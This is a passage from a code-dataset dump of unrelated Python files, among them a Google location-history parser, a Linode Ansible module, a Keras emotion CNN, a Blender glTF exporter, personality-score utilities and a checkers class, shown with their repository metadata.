status=status.HTTP_204_NO_CONTENT)\n","repo_name":"LokRaj-Vuppu/movie-database-api-drf","sub_path":"watchmate/watchlist_app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7751099134","text":"# %%\nimport json\nimport pandas as pd\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom shapely.geometry import Point, Polygon, LineString\nimport geodatasets\n\n# %matplotlib inline\n\n# %%\nf = open('Records.json')\ndata = json.load(f)\n\n# %%\nlocat = []\n\nfor i in data['locations']:\n locat.append(i)\n\nf.close()\n\n# %%\ndf = pd.DataFrame.from_dict(locat)\n\n\n# %%\nlist(df.columns)\n\n# %%\ndf['timestamp']\n\n# %%\ndf['timestamp'] = pd.to_datetime(df['timestamp'], format='ISO8601')\ndf['serverTimestamp'] = pd.to_datetime(df['serverTimestamp'], format='ISO8601')\ndf['deviceTimestamp'] = pd.to_datetime(df['deviceTimestamp'], format='ISO8601')\n\n# %%\nlatlong_factor = float(1e7)\n\ndf['longitude'] = df['longitudeE7'].astype('float64') / latlong_factor\ndf['latitude'] = df['latitudeE7'].astype('float64') / latlong_factor\n\ndf.to_csv('Records.csv')\n\ndf\n\n# %%\nsource = list(df['source'].unique())\ndeviceTag = list(df['deviceTag'].unique())\nplatformType = list(df['platformType'].unique())\nbatteryCharging = list(df['batteryCharging'].unique())\nformFactor = list(df['formFactor'].unique())\nheading = list(df['heading'].unique())\n\nprint(source)\nprint(deviceTag)\nprint(platformType)\nprint(batteryCharging)\nprint(formFactor)\nprint(heading)\n\n\n# %%\ndf[\"coordinates\"] = list(zip(df.longitude, df.latitude))\ndf[\"coordinates\"] = df[\"coordinates\"].apply(Point)\n\ndf\n\n# %%\ngdf = gpd.GeoDataFrame(df, geometry=\"coordinates\")\ngdf\n\n# %%\n# state_df = gpd.read_file(\"https://datascience.quantecon.org/assets/data/cb_2016_us_state_5m.zip\")\n# state_df.head()\n\n# %%\n# fig, gax = plt.subplots(figsize=(10, 10))\n# state_df.query(\"NAME == 'Wisconsin'\").plot(ax=gax, edgecolor=\"black\", color=\"white\")\n# plt.show()\n\n# %%\n# geodatasets.data\n\n# %%\n# print(geodatasets.get_url(\"naturalearth.land\"))\n# print(geodatasets.get_path(\"naturalearth.land\"))\n\n# naturalearth = gpd.read_file(geodatasets.get_path(\"naturalearth.land\"))\n# naturalearth\n\n# %%\n# gpd.datasets.available\n\n# %%\n# naturalearth.plot()\n# from mpl_toolkits.axes_grid1 import make_axes_locatable\n# fig, ax = plt.subplots(1, 1)\n# divider = make_axes_locatable(ax)\n# cax = divider.append_axes(\"bottom\", size=\"5%\", pad=0.1)\n\n# fig, ax = plt.subplots()\n# naturalearth.plot(ax=ax, color='white', edgecolor='black')\n\n# %%\n","repo_name":"tylermneher/google-locations","sub_path":"nb-as-script.py","file_name":"nb-as-script.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73719264487","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"This module contains all of the functionality for Linode Object Storage keys.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom typing import Any, List, Optional, Union\n\nimport ansible_collections.linode.cloud.plugins.module_utils.doc_fragments.object_keys as docs\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_common import (\n LinodeModuleBase,\n)\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_docs import (\n global_authors,\n global_requirements,\n)\nfrom ansible_specdoc.objects import (\n FieldType,\n SpecDocMeta,\n SpecField,\n SpecReturnValue,\n)\nfrom linode_api4 import ObjectStorageKeys\n\nlinode_access_spec = {\n \"cluster\": SpecField(\n type=FieldType.string,\n required=True,\n description=[\n \"The id of the cluster that the provided bucket exists under.\"\n ],\n ),\n \"bucket_name\": SpecField(\n type=FieldType.string,\n required=True,\n description=[\n \"The name of the bucket to set the key's permissions for.\"\n ],\n ),\n \"permissions\": SpecField(\n type=FieldType.string,\n required=True,\n description=[\"The permissions to give the key.\"],\n choices=[\"read_only\", \"write_only\", \"read_write\"],\n ),\n}\n\nlinode_object_keys_spec = {\n \"label\": SpecField(\n type=FieldType.string,\n description=[\"The unique label to give this key.\"],\n ),\n \"access\": SpecField(\n type=FieldType.list,\n element_type=FieldType.dict,\n suboptions=linode_access_spec,\n description=[\"A list of access permissions to give the key.\"],\n ),\n \"state\": SpecField(\n type=FieldType.string,\n description=[\"The desired state of the target.\"],\n choices=[\"present\", \"absent\"],\n required=True,\n ),\n}\n\nSPECDOC_META = SpecDocMeta(\n description=[\"Manage Linode Object Storage Keys.\"],\n requirements=global_requirements,\n author=global_authors,\n options=linode_object_keys_spec,\n examples=docs.specdoc_examples,\n return_values={\n \"key\": SpecReturnValue(\n description=\"The Object Storage key in JSON serialized form.\",\n docs_url=\"https://www.linode.com/docs/api/object-storage/#object-storage\"\n \"-key-view__responses\",\n type=FieldType.dict,\n sample=docs.result_key_samples,\n )\n },\n)\n\n\nclass LinodeObjectStorageKeys(LinodeModuleBase):\n \"\"\"Module for creating and destroying Linode Object Storage Keys\"\"\"\n\n def __init__(self) -> None:\n self.module_arg_spec = SPECDOC_META.ansible_spec\n self.required_one_of = [\"state\", \"label\"]\n self.results = {\n \"changed\": False,\n \"actions\": [],\n \"key\": None,\n }\n\n self._key: Optional[ObjectStorageKeys] = None\n\n super().__init__(\n module_arg_spec=self.module_arg_spec,\n required_one_of=self.required_one_of,\n )\n\n def _get_key_by_label(self, label: str) -> Optional[ObjectStorageKeys]:\n try:\n # For some reason we can't filter on label here\n keys = self.client.object_storage.keys()\n\n key = None\n for current_key in keys:\n if current_key.label == label:\n key = current_key\n\n return key\n\n except IndexError:\n return None\n except Exception as exception:\n return self.fail(\n msg=\"failed to get object storage key {0}: {1}\".format(\n label, exception\n )\n )\n\n def _create_key(\n self, label: str, bucket_access: Union[dict, List[dict]]\n ) -> Optional[ObjectStorageKeys]:\n \"\"\"Creates an Object Storage key with the given label and access\"\"\"\n\n try:\n return self.client.object_storage.keys_create(\n label, bucket_access=bucket_access\n )\n except Exception as exception:\n return self.fail(\n msg=\"failed to create object storage key: {0}\".format(exception)\n )\n\n def _handle_key(self) -> None:\n \"\"\"Updates the key defined in kwargs\"\"\"\n\n params = self.module.params\n label: str = params.pop(\"label\")\n access: dict = params.get(\"access\")\n\n self._key = self._get_key_by_label(label)\n\n if self._key is None:\n self._key = self._create_key(label, bucket_access=access)\n self.register_action(\"Created key {0}\".format(label))\n\n self.results[\"key\"] = self._key._raw_json\n\n def _handle_key_absent(self) -> None:\n \"\"\"Deletes the key defined in kwargs\"\"\"\n\n label = self.module.params.pop(\"label\")\n\n self._key = self._get_key_by_label(label)\n\n if self._key is not None:\n self.results[\"key\"] = self._key._raw_json\n self._key.delete()\n self.register_action(\"Deleted key {0}\".format(label))\n\n def exec_module(self, **kwargs: Any) -> Optional[dict]:\n \"\"\"Constructs and calls the Linode Object Storage Key module\"\"\"\n\n state = kwargs.pop(\"state\")\n\n if state == \"absent\":\n self._handle_key_absent()\n return self.results\n\n self._handle_key()\n\n return self.results\n\n\ndef main() -> None:\n \"\"\"Constructs and calls the Linode Object Storage key module\"\"\"\n\n LinodeObjectStorageKeys()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"linode/ansible_linode","sub_path":"plugins/modules/object_keys.py","file_name":"object_keys.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"43576634865","text":"import pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.layers import Dense, Input, Dropout, Flatten, Conv2D, BatchNormalization, Activation, MaxPooling2D\r\nfrom tensorflow.keras.models import Model, Sequential\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\r\nfrom tensorflow.keras.utils import plot_model\r\nfrom livelossplot import PlotLossesKeras\r\nfrom livelossplot.keras import PlotLossesCallback\r\nimport tensorflow as tf\r\n\r\n\r\ndef generate_np_arrays(df):\r\n original_arrays = df.image\r\n images = []\r\n for sample in original_arrays:\r\n image = np.array(sample.split(), dtype=\"float32\")\r\n image = image.reshape(48, 48)\r\n images.append(image)\r\n df[\"image\"] = images\r\n return df\r\n\r\n\r\ndef main():\r\n img_size = 48\r\n batch_size = 64 # todo: hyperparameter\r\n datagen_train = ImageDataGenerator(horizontal_flip=True) # todo: consider if necessary\r\n train_generator = datagen_train.flow_from_directory(\"train/\", target_size=(img_size, img_size),\r\n color_mode=\"grayscale\", batch_size=batch_size,\r\n class_mode='categorical', shuffle=True)\r\n\r\n val_generator = datagen_train.flow_from_directory(\"test/\", target_size=(img_size, img_size), color_mode=\"grayscale\",\r\n batch_size=batch_size, class_mode='categorical', shuffle=True)\r\n\r\n model = Sequential()\r\n # conv1\r\n model.add(Conv2D(64, (3, 3), padding='same', input_shape=(48, 48, 1)))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n\r\n # conv2\r\n model.add(Conv2D(128, (5, 5), padding='same', input_shape=(48, 48, 1)))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n\r\n # conv3\r\n model.add(Conv2D(512, (3, 3), padding='same', input_shape=(48, 48, 1)))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n\r\n # conv4\r\n model.add(Conv2D(512, (5, 5), padding='same', input_shape=(48, 48, 1)))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n\r\n model.add(Flatten())\r\n\r\n model.add(Dense(256))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(Dropout(0.25))\r\n\r\n model.add(Dense(512))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(Dropout(0.25))\r\n\r\n model.add(Dense(7, activation='softmax'))\r\n opt = Adam(learning_rate=0.0005)\r\n model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\r\n print(model.summary())\r\n\r\n \"\"\"\r\n Train and Evaluate\r\n \"\"\"\r\n epochs = 15\r\n steps_per_epoch = train_generator.n // train_generator.batch_size\r\n validation_steps = val_generator.n // val_generator.batch_size\r\n check_point = ModelCheckpoint(\"model_weights.h5\", monitor='val_accuracy', save_weights_only=True, mode='max',\r\n verbose=1)\r\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=2, min_lr=0.00001, mode='auto')\r\n call_backs = [PlotLossesCallback(), check_point, reduce_lr]\r\n history = model.fit(x=train_generator, steps_per_epoch=steps_per_epoch, epochs=epochs,\r\n validation_data=val_generator, validation_steps=validation_steps, callbacks=call_backs)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"noamraveh/AI_MNC_STAR","sub_path":"FacialExpressions/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8483623791","text":"from datetime import datetime\n\nfrom fastapi import FastAPI\nimport aiohttp\nimport asyncio\n\nHEADERS = {\"User-Agent\": \"zhang shang zhong you/6.1.1 (iPhone; iOS 14.6; Scale/3.00)\"}\nAPI_ROOT = \"https://be-prod.redrock.cqupt.edu.cn/magipoke-jwzx/\"\napp = FastAPI()\n\n\n@app.get(\"/query/{stu_id}\")\ndef root(stu_id: int):\n start = datetime.now()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n tasks = [get_exam_info(stu_id), get_kebiao_info(stu_id)]\n results = loop.run_until_complete(asyncio.gather(*tasks))\n return {\"data\": results[1] - results[0], \"time\": datetime.now() - start}\n\n\n# 获取考试记录的课程\nasync def get_exam_info(stu_id: int):\n data = {\"stuNum\": stu_id}\n async with aiohttp.ClientSession() as session:\n async with session.post(API_ROOT + \"examSchedule\", data=data) as resp:\n resp_json = await resp.json()\n result = set()\n try:\n for exam in resp_json[\"data\"]:\n result.add(exam[\"course\"])\n finally:\n return result\n\n\n# 获取课表并返回一组set\nasync def get_kebiao_info(stu_id: int):\n data = {\"stu_num\": stu_id}\n async with aiohttp.ClientSession() as session:\n async with session.post(API_ROOT + \"kebiao\", data=data) as resp:\n resp_json = await resp.json()\n result = set()\n try:\n for exam in resp_json[\"data\"]:\n result.add(exam[\"course\"])\n finally:\n\n return result\n","repo_name":"sujoshua/Redrock_ci-cd_SREhomework","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7820183673","text":"import os,sys\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\n\ndef scoreTIPI(df):\n # slice out TIPI section\n dfTIPI = df[['E+','A-','C+','S-','O+','E-','A+','C-','S+','O-']]\n # code\n dfTIPI = dfTIPI.replace(['Disagree strongly','Disagree moderately',\n 'Disagree slightly','Neither agree nor disagree',\n 'Agree slightly','Agree moderately','Agree strongly'],\n [1,2,3,4,5,6,7])\n # reverse code\n dfTIPI[['A-','S-','E-','C-','O-']] = 8-dfTIPI[['A-','S-','E-','C-','O-']]\n # score\n TIPI_scored = pd.DataFrame()\n\n for trait in ['O','C','E','A','S']:\n TIPI_scored[trait] = (dfTIPI['%s+'%trait]+dfTIPI['%s-'%trait])/2\n\n return TIPI_scored\n\ndef normTIPI(df):\n # slice out TIPI section\n dfTIPI = df[['O','C','E','A','S']]\n\n filename = 'data/External/TIPInorms.csv'\n filepath = os.path.join(os.path.dirname(os.path.dirname(__file__)),filename)\n TIPInorms = pd.read_csv(filepath, index_col=0)\n arrTIPInorms = TIPInorms[['Openness','Conscientiousness','Extraversion',\n 'Agreeableness','Emotional Stability']].values\n arrTIPI = dfTIPI.values\n\n N_,D_ = np.shape(arrTIPI)\n for d in range(D_):\n x_tmp = arrTIPI[:,d]\n x_mu = arrTIPInorms[0][d]\n x_std = arrTIPInorms[1][d]\n arrTIPI[:,d] = (x_tmp - x_mu)/x_std\n\n return pd.DataFrame(arrTIPI, columns=['O','C','E','A','S'])\n\ndef codeGender(df):\n df['GenderCode']=0\n female = ['Female','F','f','female','FEMALE','Girl','Female ','female ','Woman','woman','femail','Femail',\n 'femal','Femal','Females']\n male = ['Male','male','M','m','Male ','MALE','Make', 'Man',' Male','male ']\n df['GenderCode'][df['Gender'].isin(female)] = 1\n df['GenderCode'][df['Gender'].isin(male)] = 2\n return df['GenderCode']\n\ndef stratTIPI(df,n_strat):\n if(n_strat==3):\n for trait in ['O','C','E','A','N']:\n df['%s_strat'%trait]=0\n df['%s_strat'%trait].loc[df[trait]<-1] = -1\n df['%s_strat'%trait].loc[df[trait]>1] = 1\n# df['%s_strat'%trait].loc[df['%s_strat'%trait]==0] = 2\n if(n_strat==2):\n for trait in ['O','C','E','A','N']:\n df['%s_bistrat'%trait]=0\n df['%s_bistrat'%trait].loc[df[trait]<0] = -1\n df['%s_bistrat'%trait].loc[df[trait]>0] = 1\n return df\n\n# not mine\ndef getCronbachAlpha(itemscores):\n itemscores = np.asarray(itemscores)\n itemvars = itemscores.var(axis=1, ddof=1)\n tscores = itemscores.sum(axis=0)\n nitems = len(itemscores)\n\n return nitems / (nitems-1.) * (1 - itemvars.sum() / tscores.var(ddof=1))\n","repo_name":"melissawessel/personality-stratification","sub_path":"analysis/CodingScoring.py","file_name":"CodingScoring.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19682567298","text":"import mathutils\n\nfrom . import gltf2_blender_export_keys\nfrom io_scene_gltf2.blender.exp.gltf2_blender_gather_cache import cached\nfrom io_scene_gltf2.io.com import gltf2_io\nfrom io_scene_gltf2.blender.exp import gltf2_blender_gather_skins\nfrom io_scene_gltf2.io.exp.gltf2_io_user_extensions import export_user_extensions\nfrom ..com.gltf2_blender_extras import generate_extras\n\n@cached\ndef gather_joint(blender_object, blender_bone, export_settings):\n \"\"\"\n Generate a glTF2 node from a blender bone, as joints in glTF2 are simply nodes.\n\n :param blender_bone: a blender PoseBone\n :param export_settings: the settings for this export\n :return: a glTF2 node (acting as a joint)\n \"\"\"\n axis_basis_change = mathutils.Matrix.Identity(4)\n if export_settings[gltf2_blender_export_keys.YUP]:\n axis_basis_change = mathutils.Matrix(\n ((1.0, 0.0, 0.0, 0.0), (0.0, 0.0, 1.0, 0.0), (0.0, -1.0, 0.0, 0.0), (0.0, 0.0, 0.0, 1.0)))\n\n # extract bone transform\n if blender_bone.parent is None:\n correction_matrix_local = axis_basis_change @ blender_bone.bone.matrix_local\n else:\n correction_matrix_local = (\n blender_bone.parent.bone.matrix_local.inverted_safe() @\n blender_bone.bone.matrix_local\n )\n\n if (blender_bone.bone.use_inherit_rotation == False or blender_bone.bone.inherit_scale != \"FULL\") and blender_bone.parent != None:\n rest_mat = (blender_bone.parent.bone.matrix_local.inverted_safe() @ blender_bone.bone.matrix_local)\n matrix_basis = (rest_mat.inverted_safe() @ blender_bone.parent.matrix.inverted_safe() @ blender_bone.matrix)\n else:\n matrix_basis = blender_bone.matrix\n matrix_basis = blender_object.convert_space(pose_bone=blender_bone, matrix=matrix_basis, from_space='POSE', to_space='LOCAL')\n\n trans, rot, sca = (correction_matrix_local @ matrix_basis).decompose()\n translation, rotation, scale = (None, None, None)\n if trans[0] != 0.0 or trans[1] != 0.0 or trans[2] != 0.0:\n translation = [trans[0], trans[1], trans[2]]\n if rot[0] != 1.0 or rot[1] != 0.0 or rot[2] != 0.0 or rot[3] != 0.0:\n rotation = [rot[1], rot[2], rot[3], rot[0]]\n if sca[0] != 1.0 or sca[1] != 1.0 or sca[2] != 1.0:\n scale = [sca[0], sca[1], sca[2]]\n\n # traverse into children\n children = []\n\n if export_settings[\"gltf_def_bones\"] is False:\n for bone in blender_bone.children:\n children.append(gather_joint(blender_object, bone, export_settings))\n else:\n _, children_, _ = gltf2_blender_gather_skins.get_bone_tree(None, blender_bone.id_data)\n if blender_bone.name in children_.keys():\n for bone in children_[blender_bone.name]:\n children.append(gather_joint(blender_object, blender_bone.id_data.pose.bones[bone], export_settings))\n\n # finally add to the joints array containing all the joints in the hierarchy\n node = gltf2_io.Node(\n camera=None,\n children=children,\n extensions=None,\n extras=__gather_extras(blender_bone, export_settings),\n matrix=None,\n mesh=None,\n name=blender_bone.name,\n rotation=rotation,\n scale=scale,\n skin=None,\n translation=translation,\n weights=None\n )\n\n export_user_extensions('gather_joint_hook', export_settings, node, blender_bone)\n\n return node\n\ndef __gather_extras(blender_bone, export_settings):\n if export_settings['gltf_extras']:\n return generate_extras(blender_bone.bone)\n return None\n","repo_name":"MeltyPlayer/FinModelUtility","sub_path":"FinModelUtility/ModelPluginWrappers/blender/io_scene_gltf2/blender/exp/gltf2_blender_gather_joints.py","file_name":"gltf2_blender_gather_joints.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"53"} +{"seq_id":"12969548487","text":"from clsLocation import Location\nclass Checkers:\n\n def __init__(self, location, opLocationList = [], jumps = 0):\n self.location = location\n self.opLocationList = opLocationList\n self.king = True if self.location.row == 8 else False\n self.jumps = jumps\n\n def jumpOne(self, opLocation):\n if self.canJump(opLocation):\n self.location = self.attempt(opLocation)\n self.capture(opLocation)\n\n def jump(self):\n adjacentLocations = self.adjacentOpponents()\n if len(adjacentLocations) == 0:\n return\n else:\n opLocation = adjacentLocations[0]\n while self.canJump(opLocation):\n self.jumpOne(opLocation)\n self.jumps += 1\n if self.location.row == 8:\n self.king = True\n adjacentLocations = self.adjacentOpponents()\n if len(adjacentLocations) == 0:\n break\n else:\n opLocation = adjacentLocations[0]\n\n def isOccupied(self, location):\n for loc in self.opLocationList:\n if (loc.row == location.row) and (loc.column == location.column):\n return True\n return False\n\n def canJump(self, opLocation):\n canJump = self.location.row < 8 and self.location.row > 0\n canJump &= isinstance(opLocation, Location)\n canJump &= self.isAdjacent(opLocation)\n canJump &= (opLocation.row != 1 and opLocation.row != 8)\n canJump &= (opLocation.column != 1 and opLocation.column != 8)\n canJump &= not self.isOccupied(self.attempt(opLocation))\n return canJump\n\n def addOpponentLocation(self, opLocation):\n self.opLocationList.append(opLocation)\n\n def isAdjacent(self, opLocation):\n if self.king:\n adjacent = (opLocation.row == self.location.row - 1)\n adjacent &= (opLocation.column == self.location.column + 1 or opLocation.column == self.location.column - 1)\n else:\n adjacent = (opLocation.row == self.location.row + 1)\n adjacent &= (opLocation.column == self.location.column + 1 or opLocation.column == self.location.column - 1)\n return adjacent\n\n def attempt(self, opLocation):\n newLocation = Location()\n if self.king:\n if opLocation.row < self.location.row:\n newLocation.row = opLocation.row - 1\n if opLocation.column < self.location.column:\n newLocation.column = opLocation.column - 1\n elif opLocation.column > self.location.column:\n newLocation.column = opLocation.column + 1\n elif opLocation.row > self.location.row:\n newLocation.row = opLocation.row + 1\n if opLocation.column < self.location.column:\n newLocation.column = opLocation.column - 1\n elif opLocation.column > self.location.column:\n newLocation.column = opLocation.column + 1\n else:\n if opLocation.column < self.location.column:\n newLocation.column = opLocation.column - 1\n newLocation.row = opLocation.row + 1\n elif opLocation.column > self.location.column:\n newLocation.column = opLocation.column + 1\n newLocation.row = opLocation.row + 1\n return newLocation\n\n def adjacentOpponents(self):\n adjacentLocations = []\n for loc in self.opLocationList:\n if self.isAdjacent(loc) and self.canJump(loc):\n adjacentLocations.append(loc)\n return adjacentLocations\n\n def capture(self, opLocation):\n self.opLocationList.remove(opLocation)\n\n\n\n\n","repo_name":"matthewru/PythonLearning","sub_path":"ACSL/SampleProblems/Contest_2/clsCheckers.py","file_name":"clsCheckers.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18975325945","text":"from typing import NamedTuple, List\nfrom urllib.request import urlopen\nfrom xmltodict import parse\nfrom typedconfig.source import IniFileConfigSource\nfrom pathlib import Path\nfrom tools.configuration import parse_config\nfrom tools.db import connectToDB, get_entry_id_or_create_it, update_entry\nfrom tools.configuration import DatabaseConfig\nimport pandas as pd\n\n\nCONFIG_FILE_PATH = Path(\"import_scripts/defaultConfig.cfg\")\n\nTSA_CONFIG = Path(\"import_scripts/tsa_connection.cfg\")\ntsaConfig = DatabaseConfig()\ntsaConfig.add_source(IniFileConfigSource(TSA_CONFIG))\n\nconfig = parse_config(CONFIG_FILE_PATH)\n\n\n# get species list with codes from majo from train_europe table\nSELECT_DISTINCT_SPECIES = \"\"\"\nSELECT DISTINCT ClassName, ClassId FROM train_europe_v02 \nORDER BY ClassName ASC;\n\"\"\"\n\nspecies_train_collection = []\nwith connectToDB(tsaConfig) as db_tsa_connection:\n with db_tsa_connection.cursor() as db_tsa_cursor:\n db_tsa_cursor.execute(SELECT_DISTINCT_SPECIES)\n species_train_collection = db_tsa_cursor.fetchall()\n\nnot_matched = []\nwith connectToDB(config.database) as db_connection:\n with db_connection.cursor() as db_cursor:\n for row in species_train_collection:\n result = update_entry(\n db_cursor,\n \"species\",\n [(\"mario_id\", row[1])],\n [(\"latin_name\", row[0])],\n )\n if db_cursor.rowcount is 0:\n not_matched.append(row)\n db_connection.commit()\n\nfor i in not_matched:\n print(i[0])\nprint(\"not_matched: {}\".format(len(not_matched)))\n\n\n(\n \"AVPDPEAT\",\n \"AVPIDEMA\",\n \"AVPDLOCR\",\n \"AVPDPOPA\",\n \"AVPDCYCA\",\n \"AVPDPAMA\",\n \"AVPCPHSI\",\n \"AVPCPHTR\",\n \"AVSYSYAT\",\n \"AVTGTRTR\",\n \"AVSISIEU\",\n \"AVTUTUME\",\n \"AVTUTUPH\",\n \"AVTUTUVI\",\n \"AVMUMUST\",\n \"AVMUERRU\",\n \"AVMUFIHY\",\n \"AVMUPHPH\",\n \"AVMTANTR\",\n \"AVFRFRCO\",\n \"AVFRCOCO\",\n \"AVFRCHCH\",\n \"AVFRSPSP\",\n)\n","repo_name":"hdogan84/database","sub_path":"src/import_scripts/import_database_tsa.py","file_name":"import_database_tsa.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38931255038","text":"import pickle\nimport os\n\ntry:\n file_object = open(\"games.pydata\", \"rb\")\n games = pickle.load(file_object)\n file_object.close()\nexcept:\n games = []\n\nif len(games) > 0:\n for game in games:\n print(\"The following games were loaded from the file: %s\" % game)\nelse:\n print(\"There was no list games to load.\")\n\nnew_game = \"\"\nwhile new_game != \"quit\":\n new_game = input(\"Enter a game you enjoy playing, or type 'quit' to exit: \")\n if new_game != \"quit\":\n games.append(new_game)\n\ntry:\n file_object = open(\"games.pydata\", \"wb\")\n pickle.dump(games, file_object)\n file_object.close()\n\n print(\"I will remember the following games: \")\n for game in games:\n print(game)\nexcept Exception as e:\n print(e)\n print(\"I couldn't figure out how to store the games, sorry.\")\nos.system(\"pause\")\n","repo_name":"EmissaryEntertainment/3D-Scripting","sub_path":"Week_6/McSpadden_Exercise_6.2.py","file_name":"McSpadden_Exercise_6.2.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19949353315","text":"import os\nimport sys\nfrom pathlib import Path\n\ncur_path = sys.path[0]\n\nos.system(\"pip3 install -U pip wheel setuptools\")\nos.system(\"pip3 install -r requirements.txt\")\nos.system(\"sudo apt-get install libxcb-xinerama0\")\nos.system(\"cp {}/icons/logo.png ~/.local/share/icons/warp_gui.png\".format(cur_path))\n\ndesktop_file = '{}/.local/share/applications/WARP-Linux.desktop'.format(Path.home())\n\nfile = open(desktop_file, 'w+')\nfile.write('''[Desktop Entry]\nName=WARP-Linux \nVersion=1.0\nComment=use warp-cli in GUI\nExec=python3 {}/main.py\nIcon=warp_gui\nTerminal=false\nType=Application\n'''.format(cur_path))\nprint('Desktop file created at \"{}\"'.format(desktop_file))\n","repo_name":"0xb4dc0d3x/WarpLinuxConnector","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39013628111","text":"'''\ncreate netcdf input for inversion.\ntemplate ascii inputs provided by Kasra :\n- ffproc.receivers\n- ffproc.ampstt.bandi\n- kernel_filter.txt\n- ffproc.source\n\nothers\n\nstructure : \n\n- filters\n\n- events :\n - stations :\n - real\n - synthetics :\n - iterations :\n - measurements : \n - filter\n - windows\n - etc\n\n'''\n\nINPUT_DIR = '/home/alex/Desktop/VariousAxiSEM3DVersions/kuangdai_axisem/AxiSEM3D/build/input/measurement_files/'\nOUTPUT_DIR = '/home/alex/Desktop/VariousAxiSEM3DVersions/kuangdai_axisem/AxiSEM3D/build/input/'\n\nimport numpy as np\nfrom netCDF4 import Dataset\nimport os\nimport sys \n\nf_cmt = open(INPUT_DIR + 'CMTSOLUTION', 'r')\nf_event = open(INPUT_DIR + 'ffproc.source', 'r')\nf_receivers = open(INPUT_DIR + 'ffproc2.receivers', 'r')\nf_measurements = open(INPUT_DIR + 'ffproc2.ampstt.band01', 'r')\n\nroot_grp = Dataset(OUTPUT_DIR + 'inversion_input.nc4', 'w', format = 'NETCDF4')\n\n########## Define event group ##############\nf_cmt.readline()\ncols = f_cmt.readline().strip().split()\nevent_grp = root_grp.createGroup(cols[2])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.time_shift = cols[2]\n\ncols = f_cmt.readline().strip().split()\nevent_grp.half_duration = cols[2]\n\ncols = f_cmt.readline().strip().split()\nevent_grp.latitude = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.longitude = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.depth = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mrr = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mrr = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mpp = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mrt = float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mrp= float(cols[1])\n\ncols = f_cmt.readline().strip().split()\nevent_grp.Mtp= float(cols[1])\n\n\n########## Define station groups ##############\n\nf_receivers.readline() # junk\nfor i in range(5): # junk\n f_measurements.readline()\n \nfor line_receiver in f_receivers:\n \n cols = line_receiver.strip().split()\n \n if (cols == []): # can have empty lines before eof \n continue \n\n station_grp = event_grp.createGroup('station_' + cols[0])\n station_grp.grp = float(cols[1])\n station_grp.station_name = cols[2]\n station_grp.latitude = float(cols[3])\n station_grp.longitude = float(cols[4])\n station_grp.elevation = float(cols[5])\n station_grp.burial = float(cols[6])\n\n real_grp = station_grp.createGroup('Real_data')\n synth_grp = station_grp.createGroup('Synthetic_data')\n iter_grp = synth_grp.createGroup('iteration_1')\n \n 